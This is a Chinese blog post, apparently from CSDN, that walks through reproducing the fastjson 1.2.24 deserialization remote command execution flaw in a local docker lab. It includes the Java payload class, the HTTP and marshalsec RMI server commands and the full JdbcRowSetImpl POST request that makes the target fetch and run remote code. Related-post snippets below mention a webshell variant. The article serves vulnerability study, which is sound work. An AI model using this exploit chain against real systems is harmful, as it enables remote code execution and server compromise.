fastjson 1.2.24 反序列化导致任意命令执行漏洞 复现超详细步骤

已于 2022-07-05 14:53:32 修改
阅读量1.3k 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: 网络安全
于 2022-07-05 12:32:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yc11223344/article/details/125616955
版权

fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。

在本地启动环境:虚拟机ip:8090
在这里插入图片描述

生成class文件

首先我们需要一个java的环境
新建文件夹并且在文件夹里面建一个txt文件命名为TouchFile.java,里面写入代码

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

cmd在文件夹目录运行

javac TouchFile.java

就会看到生成了一个class文件

安装maven

可以看一下这位师傅的文章

python开启http服务

python2.x执行命令为

python2 -m SimpleHTTPServer 8000

python3.x执行命令为

python -m http.server 8000

要在class文件下执行命令,进行监听8000端口
我们可以访问:本机ip:8000
在这里插入图片描述

开启RMI环境

我们借助marshalsec项目开启RMI服务,监听9999端口
marshalsec:https://github.com/mbechler/marshalsec
下载完marshalsec之后,进到该目录下cmd运行

mvn clean package -DskipTests

会生成一个target文件夹,里面又一个marshalsec-0.0.3-SNAPSHOT-all.jar文件说明已经配置成功了

在target文件夹cmd运行

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://刚class文件的ip或域名:8000/#TouchFile" 9999

注:其中的ip也可以是本地的ip,在加上python监听的端口号

进行抓包验证

POST / HTTP/1.1
Host: your-ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://同上类文件地址:9999/TouchFile",
        "autoCommit":true
    }
}

在这里插入图片描述
这个时候就可以进入docker容器中看一下有没有创建成功
docker ps查看一下id号,在docker exec -it id号 /bin/bash进入到容器中ls查看一下

大功告成

hang0c
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
复现fastjson 1.2.24 反序列化导致任意命令执行漏洞
DXfighting_的博客
04-15 456
生成带有PHP马的class文件 把编译好的class文件传到外网系统中(这里我传到kali服务器中),并在class文件所在 的目录,Python起一个http服务。 使用marshalsec项目 启动RMI服务, 监听9999端口并加载远程类TouchFile.class: 使用burpsuite抓包后改GET包为POST包,然后在发送的请求数据包中输入以下如图payload 之后使用蚁剑连...
SpringBoot Redis配置Fastjson进行序列化和反序列化实现
10-16
主要介绍了SpringBoot Redis配置Fastjson进行序列化和反序列化实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
fastjson1.2.8 反序列化远程代码执行漏洞
05-08
astjson采用黑白名单的方法来防御反序列化漏洞导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令执行漏洞。经研究,该漏洞利用门槛较低,可绕过autoType限制,风险影响较大。
Fastjson 1.2.24反序列化漏洞复现
最新发布
weixin_60830484的博客
04-17 323
本文将进行一次详细的Fastjson 1.2.24反序列化漏洞复现
marshalsec-0.0.3-SNAPSHOT-all.jar
08-23
Moritz Bechler编写,源码地址为:https://github.com/mbechler/marshalsec,下载下来之后使用maven编译,此工具为编译好的jar包,方便没有编译环境的同学们直接jar包开启ldap和rmi服务 开启rmi服务 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://VPS/ExportObject 1099 开启ldap服务 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://VPS/ExportObject 1389 我使用这个来测试springboot jolokia的远程命令执行,也可以测试struts2 S系列的漏洞
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
marshalsec命令格式如下: java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的SpringPartiallyComparableAdvisorHolder, SpringAbstractBeanFactoryPointcutAdvisor, Rome, XBean, Resin) -t:对生成的payloads进行解码测试 -v:verbose mode, 展示生成的payloads gadget_type:指定使用的payload arguments - payload运行时使用的参数 marshalsec.<marshaller>:指定exploits,根目录下的java文件名
fastjson1.2.24含源码
02-04
fastjson1.2.24含源码
java 反序列化利用工具 marshalsec 使用简介
热门推荐
whatday的专栏
08-11 2万+
命令格式 marshalsec命令格式如下: java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的SpringPartiallyComparableAdvisorHolder, Spri
FastJson反序列化漏洞复现
小赵同学的博客
07-29 3870
漏洞利用FastJson autotype处理Json对象的时候,未对@type字段进行完整的安全性验证,攻击者可以传入危险类,并调用危险类连接远程RMI主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞,获取服务器敏感信息,甚至可以利用此漏洞进一步的对服务器数据进行操作。......
marshalsec安装教程--参考
weixin_54353204的博客
08-01 353
踩坑 - Kali下安装配置maven,完美解决!_kali安装maven_哈哥撩编程的博客-CSDN博客。下载和安装marshalsec_景天zy的博客-CSDN博客。Kali下安装配置maven,完美解决!_kali安装maven。下载和安装marshalsec_安装marshalsec
Fastjson反序列化漏洞(1.2.24 RCE)
m0_61506558的博客
09-13 2981
Fastjson是一个JSON工具库,它的作用就是把java对象转换为json形式,也可以用来将json转换为java对象。@type引入这个功能的目的是在序列化的时候防止子类中包含接口或抽象类的时候,类型丢失,这样我们在反序列化的时候就不需要再指定类名。
fastjson1.2.69反序列化远程代码执行漏洞介绍.docx
07-01
fastjson1.2.69反序列化远程代码执行漏洞介绍fastjson采用黑白名单的方法来防御反序列化漏洞导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令执行漏洞。经研究,该漏洞利用门槛较低,可绕过autoType限制,风险影响较大。阿里云应急响应中心提醒fastjson用户尽快采取安全措施阻止漏洞攻击
marshalsec-jar-master、marshalsec-jar
05-15
marshalsec-jar-master、marshalsec-jar
marshalsec.zip
05-11
marshalsec安全工具
Fastjson 1.2.24 反序列化导致任意命令执行漏洞
不曾扬帆,何以至远方
07-15 875
fastjson 1.2.24 反序列化
下载和安装marshalsec
m0_54899775的博客
01-13 5320
下载和安装marshalsec
fastjson 1.2.24 反序列化导致任意命令执行漏洞
03-16
fastjson 1.2.24 存在反序列化漏洞,攻击者可以利用该漏洞执行任意命令。该漏洞的原因是 fastjson反序列化时未对恶意数据进行足够的校验,导致攻击者可以构造恶意数据,使其被 fastjson 解析时执行任意命令。建议...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值